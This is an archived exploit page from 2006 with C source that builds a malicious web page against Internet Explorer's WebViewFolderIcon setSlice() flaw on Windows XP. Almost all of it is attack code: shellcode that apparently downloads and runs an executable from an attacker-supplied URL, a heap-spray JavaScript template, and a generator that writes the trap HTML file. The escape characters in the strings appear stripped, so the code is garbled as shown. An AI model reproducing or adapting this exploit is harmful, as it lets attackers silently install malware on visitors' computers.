[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Internet Explorer WebViewFolderIcon setSlice() Exploit (c)
# Published : 2006-09-29
# Author : LukeHack
# Previous Title : McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit
# Next Title : MS Internet Explorer WebViewFolderIcon setSlice() Exploit (html)
/*
*-----------------------------------------------------------------------
*
* Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
* Works on all Windows XP versions including SP2
*
* Author: LukeHack
* Mail: lukehack@fastwebnet.it
*
* Bug discovered by Computer H D Moore (http://www.metasploit.com)
*
* Credit: metasploit, jamikazu, yag kohna(for the shellcode)
*
* :
* Tested :
* : Windows XP SP2 + Internet Explorer 6.0 SP1
* :
* Complie : cl pociewvf.c
* :
* Usage : c:>pociewvf
* :
* :Usage: pociewvf <exe_URL> [htmlfile]
* :
*
*
*------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
FILE *fp = NULL;
char *file = "lukehack.htm";
char *url = NULL;
unsigned char sc[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF";
char * header =
"<html>n"
"<body>n"
"<script>n"
"tvar heapSprayToAddress = 0x05050505;n"
"tvar shellcode = unescape("%u9090"+"%u9090"+ n";
char * footer =
"var heapBlockSize = 0x400000;n"
"var payLoadSize = shellcode.length * 2;n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);n"
"var spraySlide = unescape("%u0505%u0505");n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);n"
"heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;n"
"memory = new Array();nn"
"for (i=0;i<heapBlocks;i++)n{n"
"ttmemory[i] = spraySlide + shellcode;n}n"
"for ( i = 0 ; i < 128 ; i++)n{nt"
"trynt{nttvar tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');n"
"tttar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );n"
"t}ntcatch(e){}n}nn"
"function getSpraySlide(spraySlide, spraySlideSize)n{nt"
"while (spraySlide.length*2<spraySlideSize)nt"
"{nttspraySlide += spraySlide;nt}n"
"tspraySlide = spraySlide.substring(0,spraySlideSize/2);ntreturn spraySlide;n}nn"
"</script>n"
"</body>n"
"</html>n";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf(""n"");
fprintf(fp, "%s", "" +n"");
}
else
{
printf(""");
fprintf(fp, "%s", """);
}
}
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
printf("";n");
fprintf(fp, "%s", "");n");
fflush(fp);
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
int sc_len = 0;
if (argc < 2)
{
printf("Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)n");
printf("Code by LukeHackn");
printf("rnUsage: %s <URL> [htmlfile]rnn", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'n");
return;
}
printf("[+] download url:%sn", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%sn", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!n");
return;
}
fprintf(fp, "%s", header);
fflush(fp);
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url)+1;
PrintPayLoad(buf, sc_len);
fprintf(fp, "%s", footer);
fflush(fp);
printf("[+] exploit write to %s success!n", file);
}
// LukeHack coded it!
// www.Syue.com [2006-09-29]